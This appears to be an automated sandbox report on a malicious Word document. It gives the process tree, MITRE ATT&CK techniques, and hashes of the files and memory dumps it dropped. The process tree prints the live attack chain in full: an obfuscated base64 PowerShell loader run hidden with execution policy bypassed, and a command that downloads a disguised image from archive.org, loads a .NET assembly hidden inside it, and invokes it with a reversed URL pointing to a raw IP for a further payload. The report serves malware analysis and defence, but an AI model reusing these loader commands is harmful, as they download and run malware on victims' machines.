￤C4⇱ ؆ ⭢ ⭛ ￤UwB1⇱ ؆ ⭢ ⭛ ￤GI⇱ ؆ ⭢ ⭛ ￤cwB0⇱ ؆ ⭢ ⭛ ￤HI⇱ ؆ ⭢ ⭛ ￤aQBu⇱ ؆ ⭢ ⭛ ￤Gc⇱ ؆ ⭢ ⭛ ￤K⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bh⇱ ؆ ⭢ ⭛ ￤HI⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤BJ⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤Hg⇱ ؆ ⭢ ⭛ ￤L⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤YgBh⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤ZQ⇱ ؆ ⭢ ⭛ ￤2⇱ ؆ ⭢ ⭛ ￤DQ⇱ ؆ ⭢ ⭛ ￤T⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤ZwB0⇱ ؆ ⭢ ⭛ ￤Gg⇱ ؆ ⭢ ⭛ ￤KQ⇱ ؆ ⭢ ⭛ ￤7⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤YwBv⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤bQBh⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤BC⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤9⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤WwBT⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤cwB0⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤bQ⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤EM⇱ ؆ ⭢ ⭛ ￤bwBu⇱ ؆ ⭢ ⭛ ￤HY⇱ ؆ ⭢ ⭛ ￤ZQBy⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤XQ⇱ ؆ ⭢ ⭛ ￤6⇱ ؆ ⭢ ⭛ ￤Do⇱ ؆ ⭢ ⭛ ￤RgBy⇱ ؆ ⭢ ⭛ ￤G8⇱ ؆ ⭢ ⭛ ￤bQBC⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤cwBl⇱ ؆ ⭢ ⭛ ￤DY⇱ ؆ ⭢ ⭛ ￤N⇱ ؆ ⭢ ⭛ ￤BT⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤cgBp⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Zw⇱ ؆ ⭢ ⭛ ￤o⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤YgBh⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤ZQ⇱ ؆ ⭢ ⭛ ￤2⇱ ؆ ⭢ ⭛ ￤DQ⇱ ؆ ⭢ ⭛ ￤QwBv⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤bQBh⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤p⇱ ؆ ⭢ ⭛ ￤Ds⇱ ؆ ⭢ ⭛ ￤J⇱ ؆ ⭢ ⭛ ￤Bs⇱ ؆ ⭢ ⭛ ￤G8⇱ ؆ ⭢ ⭛ ￤YQBk⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤BB⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤cwBl⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤YgBs⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤9⇱ ؆ ⭢ ⭛ ￤C⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤WwBT⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤cwB0⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤bQ⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤FI⇱ ؆ ⭢ ⭛ ￤ZQBm⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤ZQBj⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤aQBv⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤LgBB⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤cwBl⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤YgBs⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤XQ⇱ ؆ ⭢ ⭛ ￤6⇱ ؆ ⭢ ⭛ ￤Do⇱ ؆ ⭢ ⭛ ￤T⇱ ؆ ⭢ ⭛ ￤Bv⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤o⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤YwBv⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤bQBh⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤BC⇱ ؆ ⭢ ⭛ ￤Hk⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bl⇱ ؆ ⭢ ⭛ ￤HM⇱ ؆ ⭢ ⭛ ￤KQ⇱ ؆ ⭢ ⭛ ￤7⇱ ؆ ⭢ ⭛ ￤CQ⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤B5⇱ ؆ ⭢ ⭛ ￤H⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤ZQ⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤D0⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤bwBh⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤ZQBk⇱ ؆ ⭢ ⭛ ￤EE⇱ ؆ ⭢ ⭛ ￤cwBz⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤bQBi⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤eQ⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤Ec⇱ ؆ ⭢ ⭛ ￤ZQB0⇱ ؆ ⭢ ⭛ ￤FQ⇱ ؆ ⭢ ⭛ ￤eQBw⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤K⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤n⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤bgBs⇱ ؆ ⭢ ⭛ ￤Gk⇱ ؆ ⭢ ⭛ ￤Yg⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤Ek⇱ ؆ ⭢ ⭛ ￤Tw⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤Eg⇱ ؆ ⭢ ⭛ ￤bwBt⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤Jw⇱ ؆ ⭢ ⭛ ￤p⇱ ؆ ⭢ ⭛ ￤Ds⇱ ؆ ⭢ ⭛ ￤J⇱ ؆ ⭢ ⭛ ￤Bt⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bo⇱ ؆ ⭢ ⭛ ￤G8⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤D0⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤eQBw⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤LgBH⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤BN⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bo⇱ ؆ ⭢ ⭛ ￤G8⇱ ؆ ⭢ ⭛ ￤Z⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤o⇱ ؆ ⭢ ⭛ ￤Cc⇱ ؆ ⭢ ⭛ ￤VgBB⇱ ؆ ⭢ ⭛ ￤Ek⇱ ؆ ⭢ ⭛ ￤Jw⇱ ؆ ⭢ ⭛ ￤p⇱ ؆ ⭢ ⭛ ￤C4⇱ ؆ ⭢ ⭛ ￤SQBu⇱ ؆ ⭢ ⭛ ￤HY⇱ ؆ ⭢ ⭛ ￤bwBr⇱ ؆ ⭢ ⭛ ￤GU⇱ ؆ ⭢ ⭛ ￤K⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤k⇱ ؆ ⭢ ⭛ ￤G4⇱ ؆ ⭢ ⭛ ￤dQBs⇱ ؆ ⭢ ⭛ ￤Gw⇱ ؆ ⭢ ⭛ ￤L⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤Fs⇱ ؆ ⭢ ⭛ ￤bwBi⇱ ؆ ⭢ ⭛ ￤Go⇱ ؆ ⭢ ⭛ ￤ZQBj⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤WwBd⇱ ؆ ⭢ ⭛ ￤F0⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤o⇱ ؆ ⭢ ⭛ ￤Cc⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤B4⇱ ؆ ⭢ ⭛ ￤HQ⇱ ؆ ⭢ ⭛ ￤LgBT⇱ ؆ ⭢ ⭛ ￤EQ⇱ ؆ ⭢ ⭛ ￤R⇱ ؆ ⭢ ⭛ ￤BI⇱ ؆ ⭢ ⭛ ￤C8⇱ ؆ ⭢ ⭛ ￤Mg⇱ ؆ ⭢ ⭛ ￤y⇱ ؆ ⭢ ⭛ ￤DI⇱ ؆ ⭢ ⭛ ￤Lw⇱ ؆ ⭢ ⭛ ￤y⇱ ؆ ⭢ ⭛ ￤DU⇱ ؆ ⭢ ⭛ ￤Mg⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤DE⇱ ؆ ⭢ ⭛ ￤O⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤DI⇱ ؆ ⭢ ⭛ ￤MQ⇱ ؆ ⭢ ⭛ ￤u⇱ ؆ ⭢ ⭛ ￤Dg⇱ ؆ ⭢ ⭛ ￤OQ⇱ ؆ ⭢ ⭛ ￤x⇱ ؆ ⭢ ⭛ ￤C8⇱ ؆ ⭢ ⭛ ￤Lw⇱ ؆ ⭢ ⭛ ￤6⇱ ؆ ⭢ ⭛ ￤H⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤B0⇱ ؆ ⭢ ⭛ ￤Gg⇱ ؆ ⭢ ⭛ ￤Jw⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤Cw⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤n⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤ZQBz⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤HY⇱ ؆ ⭢ ⭛ ￤YQBk⇱ ؆ ⭢ ⭛ ￤G8⇱ ؆ ⭢ ⭛ ￤Jw⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤Cw⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤n⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤ZQBz⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤HY⇱ ؆ ⭢ ⭛ ￤YQBk⇱ ؆ ⭢ ⭛ ￤G8⇱ ؆ ⭢ ⭛ ￤Jw⇱ ؆ ⭢ ⭛ ￤g⇱ ؆ ⭢ ⭛ ￤Cw⇱ ؆ ⭢ ⭛ ￤I⇱ ؆ ⭢ ⭛ ￤⇱ ؆ ⭢ ⭛ ￤n⇱ ؆ ⭢ ⭛ ￤GQ⇱ ؆ ⭢ ⭛ ￤ZQBz⇱ ؆ ⭢ ⭛ ￤GE⇱ ؆ ⭢ ⭛ ￤d⇱ ؆ ⭢ ⭛ ￤Bp⇱ ؆ ⭢ ⭛ ￤HY⇱ ؆ ⭢ ⭛ ￤YQBk⇱ ؆ ⭢ ⭛ ￤G8⇱ ؆ ⭢ ⭛ ￤Jw⇱ ؆ ⭢ ⭛ ￤s⇱ ؆ ⭢ ⭛ ￤Cc⇱ ؆ ⭢ ⭛ ￤UgBl⇱ ؆ ⭢ ⭛ ￤Gc⇱ ؆ ⭢ ⭛ ￤QQBz⇱ ؆ ⭢ ⭛ ￤G0⇱ ؆ ⭢ ⭛ ￤Jw⇱ ؆ ⭢ ⭛ ￤s⇱ ؆ ⭢ ⭛ ￤Cc⇱ ؆ ⭢ ⭛ ￤Jw⇱ ؆ ⭢ ⭛ ￤p⇱ ؆ ⭢ ⭛ ￤Ck⇱ ؆ ⭢ ⭛ ￤';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⇱ ؆ ⭢ ⭛ ￤','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDDH/222/252.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
cbbf0da87f80cab9c5862fffa9cb7229

SHA1
89856dd546e634c01044ea91d821180bb35cfe95

SHA256
b551b30e1b107c25283792f7a78384522664de887ceec59064c2ab497d6adb05

SHA512
0c4136bc6b249e74d373b3918c24add2ecaef400626ddce61a2d58f88035d7602be59021513e34a1bba0f4595ed0abfa759ab023f1e56e378e0692eb7fb67114

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
76f5a8dc74e40c1f65122a2d62fe56c6

SHA1
bac18afdd2386e711e4560e0333785cb121d8d31

SHA256
3dc6fe539fb2d636984d3a43e74af5a63f16f40a99519575625d2824c12c6410

SHA512
0d1188783ea5d18b905f296a945e1130030e0d7649b69c83bc4f6fd134ca76fa075da61daee891b8eded7c5be356654fa2e81ed3cb411c81371f17436fb468c2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d121c188e2737887b3704edcd6b4e9e1

SHA1
fc4e7e452f91d6c33cfb5c174bbb3827ae7c6bb0

SHA256
9097244e8d29dca2215fd0f3ccce0631d6ea3b30d1f7def3036935e1d64ce586

SHA512
c6b581973bce3d694edc30bea316d9582089487aca2d148d6a23924a7e528ac40c7208668a6c987f93213426422b8c770044e88299dc17d437ecf22aa540560d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{88BD008B-2879-4B21-A958-3A332CEE1962}.FSD

Filesize
128KB

MD5
6deccae319e89c8ba782a9e69dbfd28a

SHA1
aabfce5b78a3982e9747fa17b6ea4608a65fb166

SHA256
232a0058f118e7d5018e6b760dd63d72c5960e19867dd1b6032ed64d83addb2b

SHA512
1b85ca79702dfbd26098abfd7a1da66587d9e7ec8da320cc222d64326f317536e29cbe44612ff2f62601dcbfa300301ff48086043fb6ce3fce0ac7c694b4c571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
9b7ed681a97a0ed7352affc640dabb83

SHA1
a104f3aa7757c2cb732460a8d1b14b6960390218

SHA256
52dd18213e8f2525742bdeb383a0ab48bd5572d31b87b471dc36007ffec66c65

SHA512
0c66b445a521dfa37b106043fa83f5b2aa9cbc38b7bdb5a4c6180d7ff13cc66c558384a58e3f39a4a771a91a3304495d90f591aef1a9cda6c74fd4eb697ac91b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{445DA2F3-8A25-4125-9301-15A97C4BDD4B}.FSD

Filesize
128KB

MD5
012adff6da66a9c049d1a5e9a32e6c43

SHA1
54da067ff62b31a0b6c1bd420656c6d9aaaf2645

SHA256
cfc73d771db820306586fc0cb9a5722f6ea31c1b4f0f8f84f44ebd9d8d974ff9

SHA512
a574cb8b557ae2a8124974c7b7ddf8fc946c6ed5edc48d0c234d8c33b804a8de6dc1b65c398131dba193fa63ac65ccb3edfb9a767f7a696824a3452ed2badf16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5J67VDZD\weneedbuttersmoothbunwhichreallyniceandyummywithbutterbunwhichnotknowwhyshecantunderstandbuttersmoothbutterbun____chocolatebunyummyhere[1].doc

Filesize
80KB

MD5
03c634f3b71f5dcfca4f2016482bf5f2

SHA1
b559111214ecd6318c86acc86836fbc96ac7ebf6

SHA256
6e2b7a094b6dc5bcf9880332f39b6dd6eefd711d6835bb289493cae6896c26b9

SHA512
91492321ef3cd9ea631bfaa7817d4602faae07a89a9f30c0ae99e9d017c941919c365c33e226d8d0081d17b8053b2850ba086ce39bc94137c91dc7d21e48bc7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB146.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{4ACE7746-C25A-454B-BB45-220255F0E43D}

Filesize
128KB

MD5
350e6064ce04f08e40b84404bb0af65a

SHA1
6099a553871a792b2537c9f060f5c4136a2d3d37

SHA256
7e1b9eee2e2876b659629aedb3eca36d52bdbf015c22c376164975d50ed8c5c6

SHA512
f904873ca78f71092bd0b141e6cd40fc9c2cfaf36747138f2e376560cdc27217e2b497f623cfd62e2dea28b8bd3bc083ead2b7047f825504d3bdbeeb46a17597

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
4471dd6089d6b47b3d3b3ebd90ec4952

SHA1
2a20d1eed279cc499771c2cf66d0550ec848e20e

SHA256
c6392889461706eb3f4275e7e4e7d26b773b5e2679f9ae2df7d5de8c143d7825

SHA512
958b0c0358b91a53653a83c7dfb7cfeec6aefb578f7c512336ecef864dbfc9e414c3a272af8ec8893a74695b032394a3822d181743175f4f5aab8a8a774ea404

Download Submit
C:\Users\Admin\AppData\Roaming\createdbutterbunwithnewyummybun.vBS

Filesize
178KB

MD5
a175c53485e3d9d87b47bb3b44fb3088

SHA1
cac76529a9a4054e3d6e26d898abea8985446ac0

SHA256
a4ec00ccec94adf8e31f0a7f763685825bfc526b4acd91b32d363c5477b94801

SHA512
f2ff34287072e8276c9b8e994d6a77085c091bad5836ba41e44aa3033d590a6b846dcd4944b6c939db14de2fa5588bcb063b1a6c921b3a69a0d1aad972adb5d6

Download Submit
memory/1540-1-0x00000000724AD000-0x00000000724B8000-memory.dmp

Filesize
44KB

Download
memory/1540-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1540-23-0x0000000003000000-0x0000000003002000-memory.dmp

Filesize
8KB

Download
memory/1540-123-0x00000000724AD000-0x00000000724B8000-memory.dmp

Filesize
44KB

Download
memory/2840-18-0x000000002F251000-0x000000002F252000-memory.dmp

Filesize
4KB

Download
memory/2840-20-0x00000000724AD000-0x00000000724B8000-memory.dmp

Filesize
44KB

Download
memory/2840-22-0x0000000003DB0000-0x0000000003DB2000-memory.dmp

Filesize
8KB

Download
memory/2840-124-0x00000000724AD000-0x00000000724B8000-memory.dmp

Filesize
44KB

Download
memory/2840-138-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2840-139-0x00000000724AD000-0x00000000724B8000-memory.dmp

Filesize
44KB

Download